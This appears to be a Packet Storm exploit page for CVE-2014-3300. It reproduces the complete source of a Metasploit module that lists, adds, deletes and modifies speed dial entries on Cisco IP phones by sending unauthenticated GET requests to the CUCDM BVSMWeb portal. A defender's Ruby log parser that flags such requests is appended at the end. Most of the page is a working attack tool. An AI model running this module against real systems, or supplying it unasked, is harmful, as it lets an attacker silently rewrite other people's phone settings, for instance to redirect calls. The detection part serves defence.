Viproy CUCDM IP Phone XML Services Speed Dial Attack Tool

Published: 31 Aug 2024 00:00:00. Reported by: fozavci, metasploit.com. Type: packetstorm. Source: packetstormsecurity.com

Viproy CUCDM IP Phone XML Services - Speed Dial Attack Tool. The BVSMWeb portal in Cisco Communications Domain Manager before version 10 allows unauthorized speed dial entity manipulations by remote attackers.

Related

| Reporter | Title | Published | Family |
| --- | --- | --- | --- |
| Circl | CVE-2014-3300 | 29 May 2018 15:50 | circl |
| CVE | CVE-2014-3300 | 7 Jul 2014 10:00 | cve |
| Cvelist | CVE-2014-3300 | 7 Jul 2014 10:00 | cvelist |
| Metasploit | Viproy CUCDM IP Phone XML Services - Call Forwarding Tool | 10 Jan 2015 06:28 | metasploit |
| Metasploit | Viproy CUCDM IP Phone XML Services - Speed Dial Attack Tool | 10 Jan 2015 06:29 | metasploit |
| NVD | CVE-2014-3300 | 7 Jul 2014 11:01 | nvd |
| Packet Storm | Viproy CUCDM IP Phone XML Services Call Forwarding Tool | 31 Aug 2024 00:00 | packetstorm |
| Prion | Improper access control | 7 Jul 2014 11:01 | prion |
| securityvulns | Cisco Unified Communications Domain Manager multiple security vulnerabilities | 4 Aug 2014 00:00 | securityvulns |

Code
```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'rexml/document'

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'        => 'Viproy CUCDM IP Phone XML Services - Speed Dial Attack Tool',
      'Description' => %q{
        The BVSMWeb portal in the web framework in Cisco Unified Communications Domain Manager
        (CDM), before version 10, doesn't implement access control properly, which allows remote
        attackers to modify user information. This module exploits the vulnerability to make
        unauthorized speed dial entity manipulations.
      },
      'Author'      => 'fozavci',
      'References'  =>
        [
          ['CVE', '2014-3300'],
          ['BID', '68331']
        ],
      'License'     => MSF_LICENSE,
      'Actions'     =>
        [
          [ 'List',   { 'Description' => 'Getting the speeddials for the MAC address' } ],
          [ 'Modify', { 'Description' => 'Modifying a speeddial for the MAC address' } ],
          [ 'Add',    { 'Description' => 'Adding a speeddial for the MAC address' } ],
          [ 'Delete', { 'Description' => 'Deleting a speeddial for the MAC address' } ]
        ],
      'DefaultAction' => 'List'
    ))

    register_options(
      [
        OptString.new('TARGETURI', [ true, 'Target URI for XML services', '/bvsmweb']),
        OptString.new('MAC', [ true, 'MAC Address of target phone', '000000000000']),
        OptString.new('NAME', [ false, 'Name for Speed Dial', 'viproy']),
        OptString.new('POSITION', [ false, 'Position for Speed Dial', '1']),
        OptString.new('TELNO', [ false, 'Phone number for Speed Dial', '007']),
      ])
  end

  # Dispatch to the handler for the selected action.
  def run
    case action.name.upcase
    when 'MODIFY'
      modify
    when 'DELETE'
      delete
    when 'ADD'
      add
    when 'LIST'
      list
    end
  end

  # Send a GET request to one of the XML service scripts under TARGETURI and
  # return [check code, response]. A 200 response whose body mentions
  # "Speed Dial" / "Speed dial" is treated as vulnerable.
  def send_rcv(uri, vars_get)
    uri = normalize_uri(target_uri.to_s, uri.to_s)
    res = send_request_cgi(
      {
        'uri'      => uri,
        'method'   => 'GET',
        'vars_get' => vars_get
      })

    if res && res.code == 200 && res.body && res.body.to_s =~ /Speed [Dd]ial/
      return Exploit::CheckCode::Vulnerable, res
    else
      print_error("Target appears not vulnerable!")
      return Exploit::CheckCode::Safe, res
    end
  end

  # Print the DirectoryEntry elements (Name and Telephone) of the XML response.
  def parse(res)
    doc = REXML::Document.new(res.body)
    names = []
    phones = []

    list = doc.root.get_elements('DirectoryEntry')
    list.each do |lst|
      xlist = lst.get_elements('Name')
      xlist.each {|l| names << "#{l[0]}"}
      xlist = lst.get_elements('Telephone')
      xlist.each {|l| phones << "#{l[0]}" }
    end

    if names.size > 0
      names.size.times do |i|
        # Each Name value has the form "<position>:<name>".
        info = ''
        info << "Position: #{names[i].split(":")[0]}, "
        info << "Name: #{names[i].split(":")[1]}, "
        info << "Telephone: #{phones[i]}"

        print_good("#{info}")
      end
    else
      print_status("No Speed Dial detected")
    end
  end

  def list
    mac = datastore['MAC']

    print_status("Getting Speed Dials of the IP phone")
    vars_get = {
      'device' => "SEP#{mac}"
    }

    status, res = send_rcv('speeddials.cgi', vars_get)
    parse(res) unless status == Exploit::CheckCode::Safe
  end

  def add
    mac = datastore['MAC']
    name = datastore['NAME']
    position = datastore['POSITION']
    telno = datastore['TELNO']

    print_status("Adding Speed Dial to the IP phone")
    vars_get = {
      'name'   => "#{name}",
      'telno'  => "#{telno}",
      'device' => "SEP#{mac}",
      'entry'  => "#{position}",
      'mac'    => "#{mac}"
    }
    status, res = send_rcv('phonespeedialadd.cgi', vars_get)

    if status == Exploit::CheckCode::Vulnerable && res && res.body && res.body.to_s =~ /Added/
      print_good("Speed Dial #{position} is added successfully")
    elsif res && res.body && res.body.to_s =~ /exist/
      print_error("Speed Dial is exist, change the position or choose modify!")
    else
      print_error("Speed Dial couldn't add!")
    end
  end

  def delete
    mac = datastore['MAC']
    position = datastore['POSITION']

    print_status("Deleting Speed Dial of the IP phone")

    vars_get = {
      'entry'  => "#{position}",
      'device' => "SEP#{mac}"
    }

    status, res = send_rcv('phonespeeddialdelete.cgi', vars_get)

    if status == Exploit::CheckCode::Vulnerable && res && res.body && res.body.to_s =~ /Deleted/
      print_good("Speed Dial #{position} is deleted successfully")
    else
      print_error("Speed Dial is not found!")
    end
  end

  # Modify is implemented as a delete followed by an add at the same position.
  def modify
    mac = datastore['MAC']
    name = datastore['NAME']
    position = datastore['POSITION']
    telno = datastore['TELNO']

    print_status("Deleting Speed Dial of the IP phone")

    vars_get = {
      'entry'  => "#{position}",
      'device' => "SEP#{mac}"
    }

    status, res = send_rcv('phonespeeddialdelete.cgi', vars_get)

    if status == Exploit::CheckCode::Vulnerable && res && res.body && res.body.to_s =~ /Deleted/
      print_good("Speed Dial #{position} is deleted successfully")
      print_status("Adding Speed Dial to the IP phone")

      vars_get = {
        'name'   => "#{name}",
        'telno'  => "#{telno}",
        'device' => "SEP#{mac}",
        'entry'  => "#{position}",
        'mac'    => "#{mac}"
      }

      status, res = send_rcv('phonespeedialadd.cgi', vars_get)

      if status == Exploit::CheckCode::Vulnerable && res && res.body && res.body.to_s =~ /Added/
        print_good("Speed Dial #{position} is added successfully")
      elsif res && res.body =~ /exist/
        print_error("Speed Dial is exist, change the position or choose modify!")
      else
        print_error("Speed Dial couldn't add!")
      end
    else
      print_error("Speed Dial is not found!")
    end
  end
end
```
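For defenders, the requests the module sends are easy to recognise in the portal's web access logs. The following is an added example, not part of the original module: it flags sources that change speed dials or query more than one `SEP<MAC>` device. It assumes a combined-format access log that records the query string; the log lines, addresses and MAC values are constructed, and the "more than one device per source" heuristic is an assumption that proxies or NAT in front of the phones would break.

```ruby
require 'uri'

# Endpoints and parameter names are taken from the module above.
SPEED_DIAL_ENDPOINTS = {
  'speeddials.cgi'           => :list,
  'phonespeedialadd.cgi'     => :add,
  'phonespeeddialdelete.cgi' => :delete
}.freeze

# Assumed log layout: combined access log, query string included.
LOG_LINE = /\A(?<src>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<verb>[A-Z]+) (?<target>\S+) [^"]*" (?<status>\d{3})/

# Constructed sample lines (documentation addresses, made-up MACs).
SAMPLE_LOG = <<~LOG
  192.0.2.10 - - [01/Jan/2015:10:00:00 +0000] "GET /bvsmweb/speeddials.cgi?device=SEP001122334455 HTTP/1.1" 200 512
  198.51.100.7 - - [01/Jan/2015:10:01:00 +0000] "GET /bvsmweb/speeddials.cgi?device=SEP001122334455 HTTP/1.1" 200 512
  198.51.100.7 - - [01/Jan/2015:10:01:05 +0000] "GET /bvsmweb/phonespeeddialdelete.cgi?entry=1&device=SEP001122334455 HTTP/1.1" 200 120
  198.51.100.7 - - [01/Jan/2015:10:01:06 +0000] "GET /bvsmweb/phonespeedialadd.cgi?name=x&telno=5550100&device=SEP001122334455&entry=1&mac=001122334455 HTTP/1.1" 200 120
  198.51.100.7 - - [01/Jan/2015:10:02:00 +0000] "GET /bvsmweb/speeddials.cgi?device=SEPAABBCCDDEEFF HTTP/1.1" 200 480
  192.0.2.10 - - [01/Jan/2015:10:03:00 +0000] "GET /bvsmweb/index.html HTTP/1.1" 200 900
LOG

# Parse one line into an event hash, or nil if it is not a speed dial request.
def speed_dial_event(line)
  m = LOG_LINE.match(line) or return nil
  path, query = m[:target].split('?', 2)
  action = SPEED_DIAL_ENDPOINTS[File.basename(path)] or return nil
  params = URI.decode_www_form(query.to_s).to_h
  { src: m[:src], ts: m[:ts], action: action, status: m[:status].to_i,
    device: params['device'].to_s.upcase, entry: params['entry'] }
end

# Flag sources that change speed dials (add/delete answered with 200)
# or that touch more than one device identifier.
def suspicious_sources(log_text)
  events = log_text.each_line.map { |l| speed_dial_event(l.strip) }.compact
  events.group_by { |e| e[:src] }.each_with_object({}) do |(src, evs), out|
    devices = evs.map { |e| e[:device] }.uniq
    writes  = evs.count { |e| e[:action] != :list && e[:status] == 200 }
    next unless writes.positive? || devices.size > 1
    out[src] = { devices: devices, writes: writes, requests: evs.size }
  end
end

suspicious_sources(SAMPLE_LOG).each { |src, info| puts "#{src}: #{info}" }
```

A 200 status only shows that the script answered; the module itself decides success from `Added` or `Deleted` in the response body, which an access log does not record.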
